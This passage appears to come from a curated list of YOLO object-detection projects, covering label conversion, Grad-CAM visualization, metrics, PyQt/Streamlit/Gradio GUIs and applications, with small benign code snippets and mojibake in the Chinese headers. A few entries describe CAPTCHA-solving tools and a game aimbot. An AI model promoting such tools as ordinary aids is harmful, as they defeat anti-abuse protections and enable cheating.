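Whatever the tool, the output usually lands in the same plain-text YOLO label format: one `class x_center y_center width height` line per box, with all coordinates normalized by the image size. A small sketch of the conversion from pixel-coordinate (Pascal VOC style) boxes; the helper name is hypothetical:

```python
def voc_box_to_yolo_line(cls_id, xmin, ymin, xmax, ymax, img_w, img_h):
    """Convert a Pascal-VOC style pixel box to one YOLO label line."""
    x_center = (xmin + xmax) / 2.0 / img_w
    y_center = (ymin + ymax) / 2.0 / img_h
    width = (xmax - xmin) / img_w
    height = (ymax - ymin) / img_h
    return f"{cls_id} {x_center:.6f} {y_center:.6f} {width:.6f} {height:.6f}"

# Example: a 200x100 box at (50, 80) in a 640x480 image, class 0
print(voc_box_to_yolo_line(0, 50, 80, 250, 180, 640, 480))
# -> "0 0.234375 0.270833 0.312500 0.208333"
```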
- ### Feature Map Visualization #### ็‰นๅพๅ›พๅฏ่ง†ๅŒ–
- [pooya-mohammadi/yolov5-gradcam](https://github.com/pooya-mohammadi/yolov5-gradcam) <img src="https://img.shields.io/github/stars/pooya-mohammadi/yolov5-gradcam?style=social"/> : Visualizing YOLOv5's layers using Grad-CAM.
- [TorchCAM](https://github.com/frgfm/torch-cam) <img src="https://img.shields.io/github/stars/frgfm/torch-cam?style=social"/> : Class activation maps for your PyTorch models (CAM, Grad-CAM, Grad-CAM++, Smooth Grad-CAM++, Score-CAM, SS-CAM, IS-CAM, XGrad-CAM, Layer-CAM).
- [Him-wen/OD_Heatmap](https://github.com/Him-wen/OD_Heatmap) <img src="https://img.shields.io/github/stars/Him-wen/OD_Heatmap?style=social"/> : Grad-CAM heatmap visualization for YOLO models, which intuitively shows which regions of the image contribute most to the category classification.
- ### Object Detection Evaluation Metrics #### ็›ฎๆ ‡ๆฃ€ๆต‹ๆ€ง่ƒฝ่ฏ„ไปทๆŒ‡ๆ ‡
- [rafaelpadilla/review_object_detection_metrics](https://github.com/rafaelpadilla/review_object_detection_metrics) <img src="https://img.shields.io/github/stars/rafaelpadilla/review_object_detection_metrics?style=social"/> : Object Detection Metrics. 14 object detection metrics: mean Average Precision (mAP), Average Recall (AR), Spatio-Temporal Tube Average Precision (STT-AP). This project supports different bounding box formats as in COCO, PASCAL, Imagenet, etc. "A Comparative Analysis of Object Detection Metrics with a Companion Open-Source Toolkit". (**[Electronics 2021](https://www.mdpi.com/2079-9292/10/3/279)**)
- [rafaelpadilla/Object-Detection-Metrics](https://github.com/rafaelpadilla/Object-Detection-Metrics) <img src="https://img.shields.io/github/stars/rafaelpadilla/Object-Detection-Metrics?style=social"/> : Most popular metrics used to evaluate object detection algorithms. "A Survey on Performance Metrics for Object-Detection Algorithms". (**[IWSSIP 2020](https://ieeexplore.ieee.org/abstract/document/9145130)**)
- [Cartucho/mAP](https://github.com/Cartucho/mAP) <img src="https://img.shields.io/github/stars/Cartucho/mAP?style=social"/> : mean Average Precision - This code evaluates the performance of your neural net for object recognition.
- [Lightning-AI/metrics](https://github.com/Lightning-AI/metrics) <img src="https://img.shields.io/github/stars/Lightning-AI/metrics?style=social"/> : Machine learning metrics for distributed, scalable PyTorch applications.
- [open-mmlab/mmeval](https://github.com/open-mmlab/mmeval) <img src="https://img.shields.io/github/stars/open-mmlab/mmeval?style=social"/> : MMEval is a machine learning evaluation library that supports efficient and accurate distributed evaluation on a variety of machine learning frameworks.
- [laclouis5/globox](https://github.com/laclouis5/globox) <img src="https://img.shields.io/github/stars/laclouis5/globox?style=social"/> : A package to read and convert object detection databases (COCO, YOLO, PascalVOC, LabelMe, CVAT, OpenImage, ...) and evaluate them with COCO and PascalVOC metrics.
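Under the hood, every metric package above reduces to the same primitive: intersection-over-union (IoU) between predicted and ground-truth boxes, thresholded (commonly at 0.5) to decide true versus false positives before precision and recall are averaged into mAP. A minimal IoU sketch for `(xmin, ymin, xmax, ymax)` boxes:

```python
def iou(box_a, box_b):
    """IoU of two (xmin, ymin, xmax, ymax) boxes."""
    ix1, iy1 = max(box_a[0], box_b[0]), max(box_a[1], box_b[1])
    ix2, iy2 = min(box_a[2], box_b[2]), min(box_a[3], box_b[3])
    inter = max(0.0, ix2 - ix1) * max(0.0, iy2 - iy1)  # overlap area
    area_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])
    area_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])
    union = area_a + area_b - inter
    return inter / union if union > 0 else 0.0

# A detection usually counts as a true positive when IoU >= 0.5
print(iou((0, 0, 10, 10), (5, 5, 15, 15)))  # 25 / 175 = 0.1428...
```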
- ### GUI #### ๅ›พๅฝข็”จๆˆท็•Œ้ข
- #### Streamlit-Related
- [wjnwjn59/YOLOv10_Streamlit_Demo](https://github.com/wjnwjn59/YOLOv10_Streamlit_Demo) <img src="https://img.shields.io/github/stars/wjnwjn59/YOLOv10_Streamlit_Demo?style=social"/> : A simple object detection web demo using YOLOv10 and Streamlit.
- [streamlit/demo-self-driving](https://github.com/streamlit/demo-self-driving) <img src="https://img.shields.io/github/stars/streamlit/demo-self-driving?style=social"/> : Streamlit app demonstrating an image browser for the Udacity self-driving-car dataset with realtime object detection using YOLO.
- [CodingMantras/yolov8-streamlit-detection-tracking](https://github.com/CodingMantras/yolov8-streamlit-detection-tracking) <img src="https://img.shields.io/github/stars/CodingMantras/yolov8-streamlit-detection-tracking?style=social"/> : Object detection and tracking algorithm implemented for Real-Time video streams and static images.
- [JackDance/YOLOv8-streamlit-app](https://github.com/JackDance/YOLOv8-streamlit-app) <img src="https://img.shields.io/github/stars/JackDance/YOLOv8-streamlit-app?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Use the Streamlit framework to add front-end interaction to YOLOv8. "Zhihu ใ€ŒMr.Luyaoใ€ใ€Š[Streamlit: a front-end showcase tool for deep learning / machine learning projects](https://zhuanlan.zhihu.com/p/630029493)ใ€‹".
- [xugaoxiang/yolov5-streamlit](https://github.com/xugaoxiang/yolov5-streamlit) <img src="https://img.shields.io/github/stars/xugaoxiang/yolov5-streamlit?style=social"/> : Deploy YOLOv5 detection with Streamlit.
- [Kedreamix/YoloGesture](https://github.com/Kedreamix/YoloGesture) <img src="https://img.shields.io/github/stars/Kedreamix/YoloGesture?style=social"/> : YoloGesture, a computer-vision gesture recognition control system implemented with YOLO and deployed with Streamlit.
- #### Gradio-Related
- [zyds/yolov5-code](https://github.com/zyds/yolov5-code) <img src="https://img.shields.io/github/stars/zyds/yolov5-code?style=social"/> : A hands-on, step-by-step YOLOv5 tutorial.
- [KdaiP/yolov8-deepsort-tracking](https://github.com/KdaiP/yolov8-deepsort-tracking) <img src="https://img.shields.io/github/stars/KdaiP/yolov8-deepsort-tracking?style=social"/> : Pedestrian detection and tracking with opencv + yolov8 + deepsort, with an optional WebUI (based on Gradio).
- #### QT-Related
- [Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI](https://github.com/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Ai-trainee/Traffic-Sign-Recognition-PyQt5-YOLOv5-GUI?style=social"/> : Road Sign Recognition Project Based on YOLOv5. This is a road sign recognition project based on YOLOv5, developed with a PyQt5 interface, YOLOv5 trained model, and MySQL database.
This is a road sign recognition system based on YOLOv5 ๐Ÿš€, using a MySQL database ๐Ÿ’ฝ, PyQt5 for the interface design ๐ŸŽจ, the PyTorch deep learning framework with TensorRT for acceleration โšก, plus CSS styling ๐ŸŒˆ. The system consists of five main modules: a login module ๐Ÿ”‘ responsible for user sign-in; a parameter initialization module ๐Ÿ“‹ providing the initial settings of the YOLOv5 model; a sign recognition module ๐Ÿ”, the core of the system, which recognizes road signs and writes the results into the database; a database module ๐Ÿ’พ containing two submodules for basic database operations and data analysis; and an image processing module ๐Ÿ–ผ๏ธ handling single-image processing and data augmentation. The whole system supports multiple data inputs and model switching, and provides image augmentation methods including mosaic and mixup ๐Ÿ“ˆ.
- [parker-int64/yolov5-RGBD](https://github.com/parker-int64/yolov5-RGBD) <img src="https://img.shields.io/github/stars/parker-int64/yolov5-RGBD?style=social"/> : Qt QML based yolov5 + RGBD camera program.
- [Aimol-l/qml_with_yolov7](https://github.com/Aimol-l/qml_with_yolov7) <img src="https://img.shields.io/github/stars/Aimol-l/qml_with_yolov7?style=social"/> : Recognizes video / video streams with YOLOv7 + ByteTrack, draws the GUI with QML, and shows statistics.
- [xietx1995/YOLO-QT-Camera-Tool](https://github.com/xietx1995/YOLO-QT-Camera-Tool) <img src="https://img.shields.io/github/stars/xietx1995/YOLO-QT-Camera-Tool?style=social"/> : Detecting objects from camera or local video files via Qt and YOLO.
- [Javacr/PyQt5-YOLOv5](https://github.com/Javacr/PyQt5-YOLOv5) <img src="https://img.shields.io/github/stars/Javacr/PyQt5-YOLOv5?style=social"/> : A YOLOv5 detection interface implemented with PyQt5.
- [zstar1003/yolov5_pyqt5](https://github.com/zstar1003/yolov5_pyqt5) <img src="https://img.shields.io/github/stars/zstar1003/yolov5_pyqt5?style=social"/> : A YOLOv5 object detection visualization program built with PyQt5.
- [scutlrr/Yolov4-QtGUI](https://github.com/scutlrr/Yolov4-QtGUI) <img src="https://img.shields.io/github/stars/scutlrr/Yolov4-QtGUI?style=social"/> : Yolov4-QtGUI is a visual object detection interface developed from the [QtGuiDemo](https://github.com/jmu201521121021/QtGuiDemo) project; it makes it easy to select local images or a camera to display the results of the image processing algorithm.
- [xugaoxiang/yolov5-pyqt5](https://github.com/xugaoxiang/yolov5-pyqt5) <img src="https://img.shields.io/github/stars/xugaoxiang/yolov5-pyqt5?style=social"/> : Adds a GUI to yolov5 (version 5.0) using PyQt5.
- [mxy493/YOLOv5-Qt](https://github.com/mxy493/YOLOv5-Qt) <img src="https://img.shields.io/github/stars/mxy493/YOLOv5-Qt?style=social"/> : A GUI program based on YOLOv5, supporting selection of the weight file, whether to use the GPU, the confidence threshold, and other parameters.
- [BonesCat/YoloV5_PyQt5](https://github.com/BonesCat/YoloV5_PyQt5) <img src="https://img.shields.io/github/stars/BonesCat/YoloV5_PyQt5?style=social"/> : Add gui for YoloV5 using PyQt5.
- [LuckyBoy1798/yolov5-pyqt](https://github.com/LuckyBoy1798/yolov5-pyqt) <img src="https://img.shields.io/github/stars/LuckyBoy1798/yolov5-pyqt?style=social"/> : A yolov5 + pyqt graphical detection tool for oracle-bone inscriptions.
- [PySimpleGUI/PySimpleGUI-YOLO](https://github.com/PySimpleGUI/PySimpleGUI-YOLO) <img src="https://img.shields.io/github/stars/PySimpleGUI/PySimpleGUI-YOLO?style=social"/> : A YOLO Artificial Intelligence algorithm demonstration using PySimpleGUI.
- [prabindh/qt5-opencv3-darknet](https://github.com/prabindh/qt5-opencv3-darknet) <img src="https://img.shields.io/github/stars/prabindh/qt5-opencv3-darknet?style=social"/> : Qt5 + Darknet/Yolo + OpenCV3.
- [GinkgoX/YOLOv3GUI_Pytorch_PyQt5](https://github.com/GinkgoX/YOLOv3GUI_Pytorch_PyQt5) <img src="https://img.shields.io/github/stars/GinkgoX/YOLOv3GUI_Pytorch_PyQt5?style=social"/> : This is a GUI project for Deep Learning Object Detection based on YOLOv3 model.
- [FatemeZamanian/Yolov5-Fruit-Detector](https://github.com/FatemeZamanian/Yolov5-Fruit-Detector) <img src="https://img.shields.io/github/stars/FatemeZamanian/Yolov5-Fruit-Detector?style=social"/> : A program to recognize fruits on pictures or videos using yolov5.
- [BioMeasure/PyQt5_YoLoV5_DeepSort](https://github.com/BioMeasure/PyQt5_YoLoV5_DeepSort) <img src="https://img.shields.io/github/stars/BioMeasure/PyQt5_YoLoV5_DeepSort?style=social"/> : This is a PyQt5 GUI program, which is based on YoloV5 and DeepSort to track person.
- [DongLizhong/YOLO_SORT_QT](https://github.com/DongLizhong/YOLO_SORT_QT) <img src="https://img.shields.io/github/stars/DongLizhong/YOLO_SORT_QT?style=social"/> : This code uses the OpenCV dnn module to load the darknet model for detection and adds SORT for multi-object tracking (MOT).
- [Whu-wxy/yolov5_deepsort_ncnn_qt](https://github.com/Whu-wxy/yolov5_deepsort_ncnn_qt) <img src="https://img.shields.io/github/stars/Whu-wxy/yolov5_deepsort_ncnn_qt?style=social"/> : Calls the yolov5 and deep sort models with ncnn, reading video with OpenCV.
- [jeswanthgalla/PyQt4_GUI_darknet_yolov4](https://github.com/jeswanthgalla/PyQt4_GUI_darknet_yolov4) <img src="https://img.shields.io/github/stars/jeswanthgalla/PyQt4_GUI_darknet_yolov4?style=social"/> : GUI App using PyQt4. Multithreading to process multiple camera streams and using darknet yolov4 model for object detection.
- [barleo01/yoloobjectdetector](https://github.com/barleo01/yoloobjectdetector) <img src="https://img.shields.io/github/stars/barleo01/yoloobjectdetector?style=social"/> : The purpose of this application is to capture video from a camera, apply a YOLO Object detector and display it on a simple Qt Gui.
- [Eagle104fred/PyQt5-Yolov5](https://github.com/Eagle104fred/PyQt5-Yolov5) <img src="https://img.shields.io/github/stars/Eagle104fred/PyQt5-Yolov5?style=social"/> : Displays the YOLOv5 video stream on a PyQt5 UI.
- [cnyvfang/YOLOv5-GUI](https://github.com/cnyvfang/YOLOv5-GUI) <img src="https://img.shields.io/github/stars/cnyvfang/YOLOv5-GUI?style=social"/> : Qt-GUI implementation of the YOLOv5 algorithm (ver.6 and ver.5).
- [WeNN-Artificial-Intelligence/PyQT-Object-Detection-App](https://github.com/WeNN-Artificial-Intelligence/PyQT-Object-Detection-App) <img src="https://img.shields.io/github/stars/WeNN-Artificial-Intelligence/PyQT-Object-Detection-App?style=social"/> : Real-time object detection app with Python and PyQt framework.
- [Powercube7/YOLOv5-GUI](https://github.com/Powercube7/YOLOv5-GUI) <img src="https://img.shields.io/github/stars/Powercube7/YOLOv5-GUI?style=social"/> : A simple GUI made for creating jobs in YOLOv5.
- [cdmstrong/yolov5-pyqt-moke](https://github.com/cdmstrong/yolov5-pyqt-moke) <img src="https://img.shields.io/github/stars/cdmstrong/yolov5-pyqt-moke?style=social"/> : Visual detection using yolov5 and pyqt.
- [GHigher12/Pyqt5_yolov5_unet_centernet](https://github.com/GHigher12/Pyqt5_yolov5_unet_centernet) <img src="https://img.shields.io/github/stars/GHigher12/Pyqt5_yolov5_unet_centernet?style=social"/> : A PyQt5 interface integrating the yolov5, centernet and unet algorithms, enabling image object detection and semantic segmentation.
- [chenanga/qt5_yolov5_2.0](https://github.com/chenanga/qt5_yolov5_2.0) <img src="https://img.shields.io/github/stars/chenanga/qt5_yolov5_2.0?style=social"/> : A PyQt-built YOLOv5 object detection interface, first optimized version.
- [xun-xh/yolov5-onnx-pyqt-exe](https://github.com/xun-xh/yolov5-onnx-pyqt-exe) <img src="https://img.shields.io/github/stars/xun-xh/yolov5-onnx-pyqt-exe?style=social"/> : Object detection deployment based on Yolov5 + PyQt5 + onnxruntime.
- [LPC1616/pyqt-yolox-modbus](https://github.com/LPC1616/pyqt-yolox-modbus) <img src="https://img.shields.io/github/stars/LPC1616/pyqt-yolox-modbus?style=social"/> : Qt interface + yolox recognition algorithm + Modbus communication.
- [zawawiAI/yolo_gpt](https://github.com/zawawiAI/yolo_gpt) <img src="https://img.shields.io/github/stars/zawawiAI/yolo_gpt?style=social"/> : This is a GUI application that integrates YOLOv8 object recognition with OpenAI's GPT-3 language generation model.
- [LSH9832/yolov5_training_tool](https://github.com/LSH9832/yolov5_training_tool) <img src="https://img.shields.io/github/stars/LSH9832/yolov5_training_tool?style=social"/> : A tool with a PyQt5 GUI for quickly deploying datasets and training. Still being updated; its main drawback is that it currently only supports PascalVOC-format XML label files, so labels in other formats must first be converted to PascalVOC, and it currently only works on Linux (only tried on Ubuntu 16.04-20.04).
- [Egrt/YOLO_PyQt5](https://github.com/Egrt/YOLO_PyQt5) <img src="https://img.shields.io/github/stars/Egrt/YOLO_PyQt5?style=social"/> : A multi-threaded YOLO-series object detection system built with PyQt5.
- [smartwj/yolov5_pyqt5](https://github.com/smartwj/yolov5_pyqt5) <img src="https://img.shields.io/github/stars/smartwj/yolov5_pyqt5?style=social"/> : A PyQt5 graphical host-computer tool for yolov5 object detection.
- [LitChi-bit/YOLOv5-6.0-GUI](https://github.com/LitChi-bit/YOLOv5-6.0-GUI) <img src="https://img.shields.io/github/stars/LitChi-bit/YOLOv5-6.0-GUI?style=social"/> : Qt-GUI implementation of the YOLOv5 algorithm (ver.6).
- [BraunGe/YOLOv5-GUI](https://github.com/BraunGe/YOLOv5-GUI) <img src="https://img.shields.io/github/stars/BraunGe/YOLOv5-GUI?style=social"/> : A GUI for YOLOv5, support all the 11 inference formats that YOLOv5 supports.
- [PetervanLunteren/EcoAssist](https://github.com/PetervanLunteren/EcoAssist) <img src="https://img.shields.io/github/stars/PetervanLunteren/EcoAssist?style=social"/> : A no-code platform to train and deploy YOLOv5 object detection models.
- [SwimmingLiu/yolov7-Pyside6](https://github.com/SwimmingLiu/yolov7-Pyside6) <img src="https://img.shields.io/github/stars/SwimmingLiu/yolov7-Pyside6?style=social"/> : PySide6 implementation of YOLOv7 GUI.
- #### PySide-Related
- [SwimmingLiu/YOLOSHOW](https://github.com/SwimmingLiu/YOLOSHOW) <img src="https://img.shields.io/github/stars/SwimmingLiu/YOLOSHOW?style=social"/> : YOLO SHOW - YOLOv10 / YOLOv9 / YOLOv8 / YOLOv7 / YOLOv5 / RTDETR GUI based on Pyside6. [swimmingliu.cn/posts/diary/yoloshow](https://swimmingliu.cn/posts/diary/yoloshow)
- [Jai-wei/YOLOv8-PySide6-GUI](https://github.com/Jai-wei/YOLOv8-PySide6-GUI) <img src="https://img.shields.io/github/stars/Jai-wei/YOLOv8-PySide6-GUI?style=social"/> : YoloSide - YOLOv8 GUI By PySide6.
- #### Flutter-Related
- [hiennguyen92/flutter_realtime_object_detection](https://github.com/hiennguyen92/flutter_realtime_object_detection) <img src="https://img.shields.io/github/stars/hiennguyen92/flutter_realtime_object_detection?style=social"/> : Flutter App real-time object detection with Tensorflow Lite.
- #### Slint-Related
- [codingonion/yolov5-gui-slint](https://github.com/codingonion/yolov5-gui-slint) <img src="https://img.shields.io/github/stars/codingonion/yolov5-gui-slint?style=social"/> : YOLOv5 GUI inference framework built with Slint.
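Across all of these toolkits the GUI is a thin wrapper around the same call: run the detector on an input image and display the annotated result. A minimal web-UI sketch with Gradio; the third-party `gradio` and `ultralytics` packages and the `yolov8n.pt` weight file are assumptions for illustration, not requirements of any project above:

```python
# Minimal YOLO web demo: upload an image, get the annotated detection back.
# Assumes: pip install gradio ultralytics
import gradio as gr
from ultralytics import YOLO

model = YOLO("yolov8n.pt")

def detect(image):
    """Run YOLO on a numpy image and return the annotated image."""
    results = model(image)
    # plot() returns a BGR array; flip to RGB for display in the browser
    return results[0].plot()[:, :, ::-1].copy()

demo = gr.Interface(fn=detect, inputs=gr.Image(type="numpy"),
                    outputs=gr.Image(), title="YOLO demo")
demo.launch()
```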
- ### Other Applications #### ๅ…ถๅฎƒๅบ”็”จ
- [Ikomia-dev/IkomiaApi](https://github.com/Ikomia-dev/IkomiaApi) <img src="https://img.shields.io/github/stars/Ikomia-dev/IkomiaApi?style=social"/> : State-of-the-art algorithms in Computer Vision with a few lines of code.
- [penny4860/Yolo-digit-detector](https://github.com/penny4860/Yolo-digit-detector) <img src="https://img.shields.io/github/stars/penny4860/Yolo-digit-detector?style=social"/> : Implemented digit detector in natural scene using resnet50 and Yolo-v2. I used SVHN as the training set, and implemented it using tensorflow and keras.
- [chineseocr/table-detect](https://github.com/chineseocr/table-detect) <img src="https://img.shields.io/github/stars/chineseocr/table-detect?style=social"/> : table detect (yolo), table line (unet): table detection and table cell localization.
- [thisiszhou/SexyYolo](https://github.com/thisiszhou/SexyYolo) <img src="https://img.shields.io/github/stars/thisiszhou/SexyYolo?style=social"/> : An implementation of Yolov3 with Tensorflow1.x, which could detect COCO and sexy or porn person simultaneously.
- [javirk/Person_remover](https://github.com/javirk/Person_remover) <img src="https://img.shields.io/github/stars/javirk/Person_remover?style=social"/> : People removal in images using Pix2Pix and YOLO.
- [foschmitz/yolo-python-rtsp](https://github.com/foschmitz/yolo-python-rtsp) <img src="https://img.shields.io/github/stars/foschmitz/yolo-python-rtsp?style=social"/> : Object detection using deep learning with Yolo, OpenCV and Python via Real Time Streaming Protocol (RTSP).
- [ismail-mebsout/Parsing-PDFs-using-YOLOV3](https://github.com/ismail-mebsout/Parsing-PDFs-using-YOLOV3) <img src="https://img.shields.io/github/stars/ismail-mebsout/Parsing-PDFs-using-YOLOV3?style=social"/> : Parsing pdf tables using YOLOV3.
- [008karan/PAN_OCR](https://github.com/008karan/PAN_OCR) <img src="https://img.shields.io/github/stars/008karan/PAN_OCR?style=social"/> : Building OCR using YOLO and Tesseract.
- [zeyad-mansour/lunar](https://github.com/zeyad-mansour/lunar) <img src="https://img.shields.io/github/stars/zeyad-mansour/lunar?style=social"/> : Lunar is a neural network aimbot that uses real-time object detection accelerated with CUDA on Nvidia GPUs.
- [lannguyen0910/food-recognition](https://github.com/lannguyen0910/food-recognition) <img src="https://img.shields.io/github/stars/lannguyen0910/food-recognition?style=social"/> : ๐Ÿ”๐ŸŸ๐Ÿ— Food analysis baseline with Theseus. Integrate object detection, image classification and multi-class semantic segmentation. ๐Ÿž๐Ÿ–๐Ÿ•
- [killnice/yolov5-D435i](https://github.com/killnice/yolov5-D435i) <img src="https://img.shields.io/github/stars/killnice/yolov5-D435i?style=social"/> : Using yolov5 with a RealSense D435i.
- [SahilChachra/Video-Analytics-Dashboard](https://github.com/SahilChachra/Video-Analytics-Dashboard) <img src="https://img.shields.io/github/stars/SahilChachra/Video-Analytics-Dashboard?style=social"/> : Video Analytics dashboard built using YoloV5 and Streamlit.
- [isLinXu/YOLOv5_Efficient](https://github.com/isLinXu/YOLOv5_Efficient) <img src="https://img.shields.io/github/stars/isLinXu/YOLOv5_Efficient?style=social"/> : Use yolov5 efficiently.
- [HRan2004/Yolo-ArbV2](https://github.com/HRan2004/Yolo-ArbV2) <img src="https://img.shields.io/github/stars/HRan2004/Yolo-ArbV2?style=social"/> : Yolo-ArbV2 enables optional polygon information output while fully preserving YOLOv5 functionality.
- [Badw0lf613/wmreading_system](https://github.com/Badw0lf613/wmreading_system) <img src="https://img.shields.io/github/stars/Badw0lf613/wmreading_system?style=social"/> : A water meter reading system based on YOLOv5.
- [zgcr/SimpleAICV-pytorch-ImageNet-COCO-training](https://github.com/zgcr/SimpleAICV-pytorch-ImageNet-COCO-training) <img src="https://img.shields.io/github/stars/zgcr/SimpleAICV-pytorch-ImageNet-COCO-training?style=social"/> : SimpleAICV:pytorch training example on ImageNet(ILSVRC2012)/COCO2017/VOC2007+2012 datasets.Include ResNet/DarkNet/RetinaNet/FCOS/CenterNet/TTFNet/YOLOv3/YOLOv4/YOLOv5/YOLOX.
- [ErenKaymakci/Real-Time-QR-Detection-and-Decoding](https://github.com/ErenKaymakci/Real-Time-QR-Detection-and-Decoding) <img src="https://img.shields.io/github/stars/ErenKaymakci/Real-Time-QR-Detection-and-Decoding?style=social"/> : This repo explains how QR codes work, plus QR detection and decoding.
- [LUMAIS/AntDet_YOLOv5](https://github.com/LUMAIS/AntDet_YOLOv5) <img src="https://img.shields.io/github/stars/LUMAIS/AntDet_YOLOv5?style=social"/> : Ants and their activities (trophallaxis) detection using YOLOv5 based on PyTorch.
- [Jiseong-Ok/OCR-Yolov5-SwinIR-SVTR](https://github.com/Jiseong-Ok/OCR-Yolov5-SwinIR-SVTR) <img src="https://img.shields.io/github/stars/Jiseong-Ok/OCR-Yolov5-SwinIR-SVTR?style=social"/> : OCR (Korean).
- [QIN2DIM/hcaptcha-challenger](https://github.com/QIN2DIM/hcaptcha-challenger) <img src="https://img.shields.io/github/stars/QIN2DIM/hcaptcha-challenger?style=social"/> : ๐Ÿฅ‚ Gracefully face hCaptcha challenge with YOLOv6(ONNX) embedded solution.
- [bobjiangps/vision](https://github.com/bobjiangps/vision) <img src="https://img.shields.io/github/stars/bobjiangps/vision?style=social"/> : UI automation test framework based on YOLO that recognizes element types: less code, less maintenance, and to a degree cross-platform and cross-project.
- [RizwanMunawar/yolov7-object-cropping](https://github.com/RizwanMunawar/yolov7-object-cropping) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-object-cropping?style=social"/> : YOLOv7 Object Cropping Using OpenCV.
- [RizwanMunawar/yolov7-object-blurring](https://github.com/RizwanMunawar/yolov7-object-blurring) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-object-blurring?style=social"/> : YOLOv7 Object Blurring Using PyTorch and OpenCV.
- [pacocp/YOLOF](https://github.com/pacocp/YOLOF) <img src="https://img.shields.io/github/stars/pacocp/YOLOF?style=social"/> : ๐Ÿ“น YOLO meets Optical Flow.
- [FabianPlum/OmniTrax](https://github.com/FabianPlum/OmniTrax) <img src="https://img.shields.io/github/stars/FabianPlum/OmniTrax?style=social"/> : Deep learning-based multi-animal tracking and pose estimation Blender Add-on.
- [aweihao/ExDark2Yolo](https://github.com/aweihao/ExDark2Yolo) <img src="https://img.shields.io/github/stars/aweihao/ExDark2Yolo?style=social"/> : Convert ExDark annotated format data to YOLO format data.
- [ozankaraali/yolov3-recaptcha](https://github.com/ozankaraali/yolov3-recaptcha) <img src="https://img.shields.io/github/stars/ozankaraali/yolov3-recaptcha?style=social"/> : Solve Recaptcha with YoloV3. A proof of concept Recaptcha solver using YOLOv3 on Tensorflow 2.0 and Selenium. This tutorial shows that with a better trained object detection weight file, ReCaptcha can be easily solved.
- [jyp-studio/Invoice_detection](https://github.com/jyp-studio/Invoice_detection) <img src="https://img.shields.io/github/stars/jyp-studio/Invoice_detection?style=social"/> : This is an AI model for detecting and recognizing invoice information by yolov5 and OCR.
- [vmc-7645/YOLOv8-retail](https://github.com/vmc-7645/YOLOv8-retail) <img src="https://img.shields.io/github/stars/vmc-7645/YOLOv8-retail?style=social"/> : Detect retail products via the YOLOv8 object recognition engine.
- [TAber-W/RM_4-points_yolov5](https://github.com/TAber-W/RM_4-points_yolov5) <img src="https://img.shields.io/github/stars/TAber-W/RM_4-points_yolov5?style=social"/> : Robomaster: a four-point model modified from yoloface and MobileNet.
- [eternal-echo/picking](https://github.com/eternal-echo/picking) <img src="https://img.shields.io/github/stars/eternal-echo/picking?style=social"/> : Design of a YOLOv5-based visual part-sorting system.
- [swordswind/yolo_ocr_api_server](https://github.com/swordswind/yolo_ocr_api_server) <img src="https://img.shields.io/github/stars/swordswind/yolo_ocr_api_server?style=social"/> : An image recognition API server fusing YOLOv10 and EasyOCR.
## Blogs
- [็ŸฅไนŽใ€ŒๆฑŸๅคง็™ฝใ€| ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๆฑŸๅคง็™ฝใ€](https://www.zhihu.com/people/nan-yang-8-13) - [2020-05-27๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolo็ณปๅˆ—ไน‹Yolov3&Yolov4&Yolov5&Yoloxๆ ธๅฟƒๅŸบ็ก€็Ÿฅ่ฏ†ๅฎŒๆ•ด่ฎฒ่งฃ](https://zhuanlan.zhihu.com/p/143747206) - [2020-08-10๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolo็ณปๅˆ—ไน‹Yolov5ๆ ธๅฟƒๅŸบ็ก€็Ÿฅ่ฏ†ๅฎŒๆ•ด่ฎฒ่งฃ](https://zhuanlan.zhihu.com/p/172121380) - [2021-08-09๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYoloxไน‹่‡ชๆœ‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ่ถ…่ฏฆ็ป†ๆ•™็จ‹](https://zhuanlan.zhihu.com/p/397499216) - [2021-08-11๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolo็ณปๅˆ—ไน‹Yoloxๆ ธๅฟƒๅŸบ็ก€ๅฎŒๆ•ด่ฎฒ่งฃ](https://zhuanlan.zhihu.com/p/397993315) - [2022-01-30๏ผŒๆทฑๅ…ฅๆต…ๅ‡บ0ๅŸบ็ก€ๅ…ฅ้—จAIๅŠ็›ฎๆ ‡ๆฃ€ๆต‹่ฏฆ็ป†ๅญฆไน ่ทฏๅพ„](https://zhuanlan.zhihu.com/p/463221190) - [2022-01-30๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolov5ไน‹่‡ชๆœ‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ่ถ…่ฏฆ็ป†ๆ•™็จ‹](https://zhuanlan.zhihu.com/p/463176500) - [2022-11-03๏ผŒๅฎž่ทตๆ•™็จ‹ | ๅœจyolov5ไธŠ้ชŒ่ฏ็š„ไธ€ไบ›ๆƒณๆณ•ๅฐ่ฏ•](https://mp.weixin.qq.com/s/HqXJov5fWIlgKhMp2_Ca7g) - [2022-12-17๏ผŒYOLOv6็ฒพๅบฆๆทฑๅบฆไผ˜ๅŒ–๏ผŒๆ„Ÿ็Ÿฅ้‡ๅŒ–็š„้‡ๅ‚ๅ†่ฎพ่ฎก](https://mp.weixin.qq.com/s/lm77Fe4e6e_cx_gJYhp8QA) - [2022-12-28๏ผŒRepvgg้‡ๅ‚ๆ•ฐๅŒ–๏ผŒYOLOๆฃ€ๆต‹็ฎ—ๆณ•ๆถจ็‚นๅฎž่ทต๏ผ](https://mp.weixin.qq.com/s/QZnpo24537fhGeFj7-MR_Q) - [2023-01-16๏ผŒYOLOv8่‡ชๆœ‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ๏ผŒๅŠๅคšไปปๅŠกไฝฟ็”จ่ฏฆ็ป†ๆ•™็จ‹](https://mp.weixin.qq.com/s/zhoFAKvFOHh0T1R2fvwZxQ) - [2023-01-28๏ผŒYOLOv8+DeepSORTๅŽŸ็†่ฎฒ่งฃๅŠๅฎž็Žฐ๏ผˆ้™„ๆบ็ 